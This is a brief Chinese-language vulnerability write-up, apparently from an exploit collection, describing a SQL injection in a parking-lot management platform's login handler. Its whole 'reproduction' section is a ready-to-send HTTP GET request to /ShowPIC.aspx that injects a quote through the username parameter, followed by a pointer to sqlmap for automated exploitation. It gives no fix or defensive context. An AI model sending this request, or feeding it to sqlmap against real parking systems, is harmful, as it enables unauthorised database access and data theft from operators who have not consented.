漏洞描述
打造城市级车场、车位、停车行为数据资源池,提供端到端、覆盖路内停车与路外停车等多场景的停车业务解决方案。停车场管理平台存在SQL注入漏洞
漏洞复现
POC:
GET /ShowPIC.aspx?time=0.9216554219052835&action=login&username=admin%27&password=965eb72c92a549dd HTTP/1.1
Host:
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/login.aspx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ASP.NET_SessionId=pdyvwc2flgvauuspqhypkjhi
Connection: keep-alive
sqlmap